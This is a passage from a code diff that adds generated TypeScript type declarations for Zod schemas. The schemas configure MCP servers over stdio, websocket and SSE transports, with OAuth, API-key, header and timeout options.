+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
1864
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
1865
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
1866
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
1867
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
1868
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1869
+ }, "strip", z.ZodTypeAny, {
1870
+ authorization_url?: string | undefined;
1871
+ token_url?: string | undefined;
1872
+ client_id?: string | undefined;
1873
+ client_secret?: string | undefined;
1874
+ scope?: string | undefined;
1875
+ redirect_uri?: string | undefined;
1876
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1877
+ grant_types_supported?: string[] | undefined;
1878
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1879
+ response_types_supported?: string[] | undefined;
1880
+ code_challenge_methods_supported?: string[] | undefined;
1881
+ skip_code_challenge_check?: boolean | undefined;
1882
+ revocation_endpoint?: string | undefined;
1883
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1884
+ }, {
1885
+ authorization_url?: string | undefined;
1886
+ token_url?: string | undefined;
1887
+ client_id?: string | undefined;
1888
+ client_secret?: string | undefined;
1889
+ scope?: string | undefined;
1890
+ redirect_uri?: string | undefined;
1891
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1892
+ grant_types_supported?: string[] | undefined;
1893
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1894
+ response_types_supported?: string[] | undefined;
1895
+ code_challenge_methods_supported?: string[] | undefined;
1896
+ skip_code_challenge_check?: boolean | undefined;
1897
+ revocation_endpoint?: string | undefined;
1898
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1899
+ }>>;
1900
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
1901
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1902
+ /**
1903
+ * API Key authentication configuration for SSE and Streamable HTTP transports
1904
+ * - source: 'admin' means the key is provided by admin and shared by all users
1905
+ * - source: 'user' means each user provides their own key via customUserVars
1906
+ */
1907
+ apiKey: z.ZodOptional<z.ZodObject<{
1908
+ /** API key value (only for admin-provided mode, stored encrypted) */
1909
+ key: z.ZodOptional<z.ZodString>;
1910
+ /** Whether key is provided by admin or each user */
1911
+ source: z.ZodEnum<["admin", "user"]>;
1912
+ /** How to format the authorization header */
1913
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
1914
+ /** Custom header name when authorization_type is 'custom' */
1915
+ custom_header: z.ZodOptional<z.ZodString>;
1916
+ }, "strip", z.ZodTypeAny, {
1917
+ source: "admin" | "user";
1918
+ authorization_type: "custom" | "basic" | "bearer";
1919
+ key?: string | undefined;
1920
+ custom_header?: string | undefined;
1921
+ }, {
1922
+ source: "admin" | "user";
1923
+ authorization_type: "custom" | "basic" | "bearer";
1924
+ key?: string | undefined;
1925
+ custom_header?: string | undefined;
1926
+ }>>;
1927
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
1928
+ title: z.ZodString;
1929
+ description: z.ZodString;
1930
+ }, "strip", z.ZodTypeAny, {
1931
+ title: string;
1932
+ description: string;
1933
+ }, {
1934
+ title: string;
1935
+ description: string;
1936
+ }>>>;
1937
+ } & {
1938
+ type: z.ZodDefault<z.ZodLiteral<"stdio">>;
1939
+ /**
1940
+ * The executable to run to start the server.
1941
+ */
1942
+ command: z.ZodString;
1943
+ /**
1944
+ * Command line arguments to pass to the executable.
1945
+ */
1946
+ args: z.ZodArray<z.ZodString, "many">;
1947
+ /**
1948
+ * The environment to use when spawning the process.
1949
+ *
1950
+ * If not specified, the result of getDefaultEnvironment() will be used.
1951
+ * Environment variables can be referenced using ${VAR_NAME} syntax.
1952
+ */
1953
+ env: z.ZodEffects<z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>, Record<string, string> | undefined, Record<string, string> | undefined>;
1954
+ /**
1955
+ * How to handle stderr of the child process. This matches the semantics of Node's `child_process.spawn`.
1956
+ *
1957
+ * @type {import('node:child_process').IOType | import('node:stream').Stream | number}
1958
+ *
1959
+ * The default is "inherit", meaning messages to stderr will be printed to the parent process's stderr.
1960
+ */
1961
+ stderr: z.ZodOptional<z.ZodUnion<[z.ZodEnum<["pipe", "ignore", "inherit"]>, z.ZodNumber]>>;
1962
+ }, "strip", z.ZodTypeAny, {
1963
+ type: "stdio";
1964
+ command: string;
1965
+ args: string[];
1966
+ title?: string | undefined;
1967
+ description?: string | undefined;
1968
+ startup?: boolean | undefined;
1969
+ iconPath?: string | undefined;
1970
+ timeout?: number | undefined;
1971
+ sseReadTimeout?: number | undefined;
1972
+ initTimeout?: number | undefined;
1973
+ chatMenu?: boolean | undefined;
1974
+ serverInstructions?: string | boolean | undefined;
1975
+ requiresOAuth?: boolean | undefined;
1976
+ oauth?: {
1977
+ authorization_url?: string | undefined;
1978
+ token_url?: string | undefined;
1979
+ client_id?: string | undefined;
1980
+ client_secret?: string | undefined;
1981
+ scope?: string | undefined;
1982
+ redirect_uri?: string | undefined;
1983
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1984
+ grant_types_supported?: string[] | undefined;
1985
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1986
+ response_types_supported?: string[] | undefined;
1987
+ code_challenge_methods_supported?: string[] | undefined;
1988
+ skip_code_challenge_check?: boolean | undefined;
1989
+ revocation_endpoint?: string | undefined;
1990
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1991
+ } | undefined;
1992
+ oauth_headers?: Record<string, string> | undefined;
1993
+ apiKey?: {
1994
+ source: "admin" | "user";
1995
+ authorization_type: "custom" | "basic" | "bearer";
1996
+ key?: string | undefined;
1997
+ custom_header?: string | undefined;
1998
+ } | undefined;
1999
+ customUserVars?: Record<string, {
2000
+ title: string;
2001
+ description: string;
2002
+ }> | undefined;
2003
+ env?: Record<string, string> | undefined;
2004
+ stderr?: number | "pipe" | "ignore" | "inherit" | undefined;
2005
+ }, {
2006
+ command: string;
2007
+ args: string[];
2008
+ title?: string | undefined;
2009
+ description?: string | undefined;
2010
+ startup?: boolean | undefined;
2011
+ iconPath?: string | undefined;
2012
+ timeout?: number | undefined;
2013
+ sseReadTimeout?: number | undefined;
2014
+ initTimeout?: number | undefined;
2015
+ chatMenu?: boolean | undefined;
2016
+ type?: "stdio" | undefined;
2017
+ serverInstructions?: string | boolean | undefined;
2018
+ requiresOAuth?: boolean | undefined;
2019
+ oauth?: {
2020
+ authorization_url?: string | undefined;
2021
+ token_url?: string | undefined;
2022
+ client_id?: string | undefined;
2023
+ client_secret?: string | undefined;
2024
+ scope?: string | undefined;
2025
+ redirect_uri?: string | undefined;
2026
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2027
+ grant_types_supported?: string[] | undefined;
2028
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2029
+ response_types_supported?: string[] | undefined;
2030
+ code_challenge_methods_supported?: string[] | undefined;
2031
+ skip_code_challenge_check?: boolean | undefined;
2032
+ revocation_endpoint?: string | undefined;
2033
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2034
+ } | undefined;
2035
+ oauth_headers?: Record<string, string> | undefined;
2036
+ apiKey?: {
2037
+ source: "admin" | "user";
2038
+ authorization_type: "custom" | "basic" | "bearer";
2039
+ key?: string | undefined;
2040
+ custom_header?: string | undefined;
2041
+ } | undefined;
2042
+ customUserVars?: Record<string, {
2043
+ title: string;
2044
+ description: string;
2045
+ }> | undefined;
2046
+ env?: Record<string, string> | undefined;
2047
+ stderr?: number | "pipe" | "ignore" | "inherit" | undefined;
2048
+ }>, z.ZodObject<{
2049
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
2050
+ title: z.ZodOptional<z.ZodString>;
2051
+ /** Description of the MCP server */
2052
+ description: z.ZodOptional<z.ZodString>;
2053
+ /**
2054
+ * Controls whether the MCP server is initialized during application startup.
2055
+ * - true (default): Server is initialized during app startup and included in app-level connections
2056
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
2057
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
2058
+ */
2059
+ startup: z.ZodOptional<z.ZodBoolean>;
2060
+ iconPath: z.ZodOptional<z.ZodString>;
2061
+ timeout: z.ZodOptional<z.ZodNumber>;
2062
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
2063
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
2064
+ initTimeout: z.ZodOptional<z.ZodNumber>;
2065
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
2066
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
2067
+ /**
2068
+ * Controls server instruction behavior:
2069
+ * - undefined/not set: No instructions included (default)
2070
+ * - true: Use server-provided instructions
2071
+ * - string: Use custom instructions (overrides server-provided)
2072
+ */
2073
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
2074
+ /**
2075
+ * Whether this server requires OAuth authentication
2076
+ * If not specified, will be auto-detected during construction
2077
+ */
2078
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
2079
+ /**
2080
+ * OAuth configuration for SSE and Streamable HTTP transports
2081
+ * - Optional: OAuth can be auto-discovered on 401 responses
2082
+ * - Pre-configured values will skip discovery steps
2083
+ */
2084
+ oauth: z.ZodOptional<z.ZodObject<{
2085
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
2086
+ authorization_url: z.ZodOptional<z.ZodString>;
2087
+ /** OAuth token endpoint (optional - can be auto-discovered) */
2088
+ token_url: z.ZodOptional<z.ZodString>;
2089
+ /** OAuth client ID (optional - can use dynamic registration) */
2090
+ client_id: z.ZodOptional<z.ZodString>;
2091
+ /** OAuth client secret (optional - can use dynamic registration) */
2092
+ client_secret: z.ZodOptional<z.ZodString>;
2093
+ /** OAuth scopes to request */
2094
+ scope: z.ZodOptional<z.ZodString>;
2095
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
2096
+ redirect_uri: z.ZodOptional<z.ZodString>;
2097
+ /** Token exchange method */
2098
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
2099
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
2100
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2101
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
2102
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2103
+ /** Supported response types (defaults to ['code']) */
2104
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2105
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
2106
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2107
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
2108
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
2109
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
2110
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
2111
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
2112
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2113
+ }, "strip", z.ZodTypeAny, {
2114
+ authorization_url?: string | undefined;
2115
+ token_url?: string | undefined;
2116
+ client_id?: string | undefined;
2117
+ client_secret?: string | undefined;
2118
+ scope?: string | undefined;
2119
+ redirect_uri?: string | undefined;
2120
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2121
+ grant_types_supported?: string[] | undefined;
2122
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2123
+ response_types_supported?: string[] | undefined;
2124
+ code_challenge_methods_supported?: string[] | undefined;
2125
+ skip_code_challenge_check?: boolean | undefined;
2126
+ revocation_endpoint?: string | undefined;
2127
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2128
+ }, {
2129
+ authorization_url?: string | undefined;
2130
+ token_url?: string | undefined;
2131
+ client_id?: string | undefined;
2132
+ client_secret?: string | undefined;
2133
+ scope?: string | undefined;
2134
+ redirect_uri?: string | undefined;
2135
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2136
+ grant_types_supported?: string[] | undefined;
2137
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2138
+ response_types_supported?: string[] | undefined;
2139
+ code_challenge_methods_supported?: string[] | undefined;
2140
+ skip_code_challenge_check?: boolean | undefined;
2141
+ revocation_endpoint?: string | undefined;
2142
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2143
+ }>>;
2144
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
2145
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
2146
+ /**
2147
+ * API Key authentication configuration for SSE and Streamable HTTP transports
2148
+ * - source: 'admin' means the key is provided by admin and shared by all users
2149
+ * - source: 'user' means each user provides their own key via customUserVars
2150
+ */
2151
+ apiKey: z.ZodOptional<z.ZodObject<{
2152
+ /** API key value (only for admin-provided mode, stored encrypted) */
2153
+ key: z.ZodOptional<z.ZodString>;
2154
+ /** Whether key is provided by admin or each user */
2155
+ source: z.ZodEnum<["admin", "user"]>;
2156
+ /** How to format the authorization header */
2157
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
2158
+ /** Custom header name when authorization_type is 'custom' */
2159
+ custom_header: z.ZodOptional<z.ZodString>;
2160
+ }, "strip", z.ZodTypeAny, {
2161
+ source: "admin" | "user";
2162
+ authorization_type: "custom" | "basic" | "bearer";
2163
+ key?: string | undefined;
2164
+ custom_header?: string | undefined;
2165
+ }, {
2166
+ source: "admin" | "user";
2167
+ authorization_type: "custom" | "basic" | "bearer";
2168
+ key?: string | undefined;
2169
+ custom_header?: string | undefined;
2170
+ }>>;
2171
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
2172
+ title: z.ZodString;
2173
+ description: z.ZodString;
2174
+ }, "strip", z.ZodTypeAny, {
2175
+ title: string;
2176
+ description: string;
2177
+ }, {
2178
+ title: string;
2179
+ description: string;
2180
+ }>>>;
2181
+ } & {
2182
+ type: z.ZodDefault<z.ZodLiteral<"websocket">>;
2183
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
2184
+ }, "strip", z.ZodTypeAny, {
2185
+ type: "websocket";
2186
+ url: string;
2187
+ title?: string | undefined;
2188
+ description?: string | undefined;
2189
+ startup?: boolean | undefined;
2190
+ iconPath?: string | undefined;
2191
+ timeout?: number | undefined;
2192
+ sseReadTimeout?: number | undefined;
2193
+ initTimeout?: number | undefined;
2194
+ chatMenu?: boolean | undefined;
2195
+ serverInstructions?: string | boolean | undefined;
2196
+ requiresOAuth?: boolean | undefined;
2197
+ oauth?: {
2198
+ authorization_url?: string | undefined;
2199
+ token_url?: string | undefined;
2200
+ client_id?: string | undefined;
2201
+ client_secret?: string | undefined;
2202
+ scope?: string | undefined;
2203
+ redirect_uri?: string | undefined;
2204
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2205
+ grant_types_supported?: string[] | undefined;
2206
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2207
+ response_types_supported?: string[] | undefined;
2208
+ code_challenge_methods_supported?: string[] | undefined;
2209
+ skip_code_challenge_check?: boolean | undefined;
2210
+ revocation_endpoint?: string | undefined;
2211
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2212
+ } | undefined;
2213
+ oauth_headers?: Record<string, string> | undefined;
2214
+ apiKey?: {
2215
+ source: "admin" | "user";
2216
+ authorization_type: "custom" | "basic" | "bearer";
2217
+ key?: string | undefined;
2218
+ custom_header?: string | undefined;
2219
+ } | undefined;
2220
+ customUserVars?: Record<string, {
2221
+ title: string;
2222
+ description: string;
2223
+ }> | undefined;
2224
+ }, {
2225
+ url: string;
2226
+ title?: string | undefined;
2227
+ description?: string | undefined;
2228
+ startup?: boolean | undefined;
2229
+ iconPath?: string | undefined;
2230
+ timeout?: number | undefined;
2231
+ sseReadTimeout?: number | undefined;
2232
+ initTimeout?: number | undefined;
2233
+ chatMenu?: boolean | undefined;
2234
+ type?: "websocket" | undefined;
2235
+ serverInstructions?: string | boolean | undefined;
2236
+ requiresOAuth?: boolean | undefined;
2237
+ oauth?: {
2238
+ authorization_url?: string | undefined;
2239
+ token_url?: string | undefined;
2240
+ client_id?: string | undefined;
2241
+ client_secret?: string | undefined;
2242
+ scope?: string | undefined;
2243
+ redirect_uri?: string | undefined;
2244
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2245
+ grant_types_supported?: string[] | undefined;
2246
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2247
+ response_types_supported?: string[] | undefined;
2248
+ code_challenge_methods_supported?: string[] | undefined;
2249
+ skip_code_challenge_check?: boolean | undefined;
2250
+ revocation_endpoint?: string | undefined;
2251
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2252
+ } | undefined;
2253
+ oauth_headers?: Record<string, string> | undefined;
2254
+ apiKey?: {
2255
+ source: "admin" | "user";
2256
+ authorization_type: "custom" | "basic" | "bearer";
2257
+ key?: string | undefined;
2258
+ custom_header?: string | undefined;
2259
+ } | undefined;
2260
+ customUserVars?: Record<string, {
2261
+ title: string;
2262
+ description: string;
2263
+ }> | undefined;
2264
+ }>, z.ZodObject<{
2265
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
2266
+ title: z.ZodOptional<z.ZodString>;
2267
+ /** Description of the MCP server */
2268
+ description: z.ZodOptional<z.ZodString>;
2269
+ /**
2270
+ * Controls whether the MCP server is initialized during application startup.
2271
+ * - true (default): Server is initialized during app startup and included in app-level connections
2272
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
2273
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
2274
+ */
2275
+ startup: z.ZodOptional<z.ZodBoolean>;
2276
+ iconPath: z.ZodOptional<z.ZodString>;
2277
+ timeout: z.ZodOptional<z.ZodNumber>;
2278
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
2279
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
2280
+ initTimeout: z.ZodOptional<z.ZodNumber>;
2281
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
2282
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
2283
+ /**
2284
+ * Controls server instruction behavior:
2285
+ * - undefined/not set: No instructions included (default)
2286
+ * - true: Use server-provided instructions
2287
+ * - string: Use custom instructions (overrides server-provided)
2288
+ */
2289
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
2290
+ /**
2291
+ * Whether this server requires OAuth authentication
2292
+ * If not specified, will be auto-detected during construction
2293
+ */
2294
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
2295
+ /**
2296
+ * OAuth configuration for SSE and Streamable HTTP transports
2297
+ * - Optional: OAuth can be auto-discovered on 401 responses
2298
+ * - Pre-configured values will skip discovery steps
2299
+ */
2300
+ oauth: z.ZodOptional<z.ZodObject<{
2301
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
2302
+ authorization_url: z.ZodOptional<z.ZodString>;
2303
+ /** OAuth token endpoint (optional - can be auto-discovered) */
2304
+ token_url: z.ZodOptional<z.ZodString>;
2305
+ /** OAuth client ID (optional - can use dynamic registration) */
2306
+ client_id: z.ZodOptional<z.ZodString>;
2307
+ /** OAuth client secret (optional - can use dynamic registration) */
2308
+ client_secret: z.ZodOptional<z.ZodString>;
2309
+ /** OAuth scopes to request */
2310
+ scope: z.ZodOptional<z.ZodString>;
2311
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
2312
+ redirect_uri: z.ZodOptional<z.ZodString>;
2313
+ /** Token exchange method */
2314
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
2315
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
2316
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2317
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
2318
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2319
+ /** Supported response types (defaults to ['code']) */
2320
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2321
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
2322
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2323
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
2324
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
2325
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
2326
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
2327
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
2328
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2329
+ }, "strip", z.ZodTypeAny, {
2330
+ authorization_url?: string | undefined;
2331
+ token_url?: string | undefined;
2332
+ client_id?: string | undefined;
2333
+ client_secret?: string | undefined;
2334
+ scope?: string | undefined;
2335
+ redirect_uri?: string | undefined;
2336
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2337
+ grant_types_supported?: string[] | undefined;
2338
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2339
+ response_types_supported?: string[] | undefined;
2340
+ code_challenge_methods_supported?: string[] | undefined;
2341
+ skip_code_challenge_check?: boolean | undefined;
2342
+ revocation_endpoint?: string | undefined;
2343
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2344
+ }, {
2345
+ authorization_url?: string | undefined;
2346
+ token_url?: string | undefined;
2347
+ client_id?: string | undefined;
2348
+ client_secret?: string | undefined;
2349
+ scope?: string | undefined;
2350
+ redirect_uri?: string | undefined;
2351
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2352
+ grant_types_supported?: string[] | undefined;
2353
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2354
+ response_types_supported?: string[] | undefined;
2355
+ code_challenge_methods_supported?: string[] | undefined;
2356
+ skip_code_challenge_check?: boolean | undefined;
2357
+ revocation_endpoint?: string | undefined;
2358
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2359
+ }>>;
2360
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
2361
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
2362
+ /**
2363
+ * API Key authentication configuration for SSE and Streamable HTTP transports
2364
+ * - source: 'admin' means the key is provided by admin and shared by all users
2365
+ * - source: 'user' means each user provides their own key via customUserVars
2366
+ */
2367
+ apiKey: z.ZodOptional<z.ZodObject<{
2368
+ /** API key value (only for admin-provided mode, stored encrypted) */
2369
+ key: z.ZodOptional<z.ZodString>;
2370
+ /** Whether key is provided by admin or each user */
2371
+ source: z.ZodEnum<["admin", "user"]>;
2372
+ /** How to format the authorization header */
2373
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
2374
+ /** Custom header name when authorization_type is 'custom' */
2375
+ custom_header: z.ZodOptional<z.ZodString>;
2376
+ }, "strip", z.ZodTypeAny, {
2377
+ source: "admin" | "user";
2378
+ authorization_type: "custom" | "basic" | "bearer";
2379
+ key?: string | undefined;
2380
+ custom_header?: string | undefined;
2381
+ }, {
2382
+ source: "admin" | "user";
2383
+ authorization_type: "custom" | "basic" | "bearer";
2384
+ key?: string | undefined;
2385
+ custom_header?: string | undefined;
2386
+ }>>;
2387
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
2388
+ title: z.ZodString;
2389
+ description: z.ZodString;
2390
+ }, "strip", z.ZodTypeAny, {
2391
+ title: string;
2392
+ description: string;
2393
+ }, {
2394
+ title: string;
2395
+ description: string;
2396
+ }>>>;
2397
+ } & {
2398
+ type: z.ZodDefault<z.ZodLiteral<"sse">>;
2399
+ headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
2400
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
2401
+ }, "strip", z.ZodTypeAny, {
2402
+ type: "sse";
2403
+ url: string;
2404
+ title?: string | undefined;
2405
+ description?: string | undefined;
2406
+ startup?: boolean | undefined;
2407
+ iconPath?: string | undefined;
2408
+ timeout?: number | undefined;
2409
+ sseReadTimeout?: number | undefined;
2410
+ initTimeout?: number | undefined;
2411
+ chatMenu?: boolean | undefined;
2412
+ serverInstructions?: string | boolean | undefined;
2413
+ requiresOAuth?: boolean | undefined;
2414
+ oauth?: {
2415
+ authorization_url?: string | undefined;
2416
+ token_url?: string | undefined;
2417
+ client_id?: string | undefined;
2418
+ client_secret?: string | undefined;
2419
+ scope?: string | undefined;
2420
+ redirect_uri?: string | undefined;
2421
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2422
+ grant_types_supported?: string[] | undefined;
2423
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2424
+ response_types_supported?: string[] | undefined;
2425
+ code_challenge_methods_supported?: string[] | undefined;
2426
+ skip_code_challenge_check?: boolean | undefined;
2427
+ revocation_endpoint?: string | undefined;
2428
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2429
+ } | undefined;
2430
+ oauth_headers?: Record<string, string> | undefined;
2431
+ apiKey?: {
2432
+ source: "admin" | "user";
2433
+ authorization_type: "custom" | "basic" | "bearer";
2434
+ key?: string | undefined;
2435
+ custom_header?: string | undefined;
2436
+ } | undefined;
2437
+ customUserVars?: Record<string, {
2438
+ title: string;
2439
+ description: string;
2440
+ }> | undefined;
2441
+ headers?: Record<string, string> | undefined;
2442
+ }, {
2443
+ url: string;
2444
+ title?: string | undefined;
2445
+ description?: string | undefined;
2446
+ startup?: boolean | undefined;
2447
+ iconPath?: string | undefined;
2448
+ timeout?: number | undefined;
2449
+ sseReadTimeout?: number | undefined;
2450
+ initTimeout?: number | undefined;
2451
+ chatMenu?: boolean | undefined;
2452
+ type?: "sse" | undefined;
2453
+ serverInstructions?: string | boolean | undefined;
2454
+ requiresOAuth?: boolean | undefined;
2455
+ oauth?: {
2456
+ authorization_url?: string | undefined;
2457
+ token_url?: string | undefined;
2458
+ client_id?: string | undefined;
2459
+ client_secret?: string | undefined;
2460
+ scope?: string | undefined;
2461
+ redirect_uri?: string | undefined;
2462
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2463
+ grant_types_supported?: string[] | undefined;
2464
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2465
+ response_types_supported?: string[] | undefined;
2466
+ code_challenge_methods_supported?: string[] | undefined;
2467
+ skip_code_challenge_check?: boolean | undefined;
2468
+ revocation_endpoint?: string | undefined;
2469
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2470
+ } | undefined;
2471
+ oauth_headers?: Record<string, string> | undefined;
2472
+ apiKey?: {
2473
+ source: "admin" | "user";
2474
+ authorization_type: "custom" | "basic" | "bearer";
2475
+ key?: string | undefined;
2476
+ custom_header?: string | undefined;
2477
+ } | undefined;
2478
+ customUserVars?: Record<string, {
2479
+ title: string;
2480
+ description: string;
2481
+ }> | undefined;
2482
+ headers?: Record<string, string> | undefined;
2483
+ }>, z.ZodObject<{
2484
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
2485
+ title: z.ZodOptional<z.ZodString>;
2486
+ /** Description of the MCP server */
2487
+ description: z.ZodOptional<z.ZodString>;
2488
+ /**
2489
+ * Controls whether the MCP server is initialized during application startup.
2490
+ * - true (default): Server is initialized during app startup and included in app-level connections
2491
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
2492
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
2493
+ */
2494
+ startup: z.ZodOptional<z.ZodBoolean>;
2495
+ iconPath: z.ZodOptional<z.ZodString>;
2496
+ timeout: z.ZodOptional<z.ZodNumber>;
2497
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
2498
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
2499
+ initTimeout: z.ZodOptional<z.ZodNumber>;
2500
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
2501
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
2502
+ /**
2503
+ * Controls server instruction behavior:
2504
+ * - undefined/not set: No instructions included (default)
2505
+ * - true: Use server-provided instructions
2506
+ * - string: Use custom instructions (overrides server-provided)
2507
+ */
2508
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
2509
+ /**
2510
+ * Whether this server requires OAuth authentication
2511
+ * If not specified, will be auto-detected during construction
2512
+ */
2513
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
2514
+ /**
2515
+ * OAuth configuration for SSE and Streamable HTTP transports
2516
+ * - Optional: OAuth can be auto-discovered on 401 responses
2517
+ * - Pre-configured values will skip discovery steps
2518
+ */
2519
+ oauth: z.ZodOptional<z.ZodObject<{
2520
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
2521
+ authorization_url: z.ZodOptional<z.ZodString>;
2522
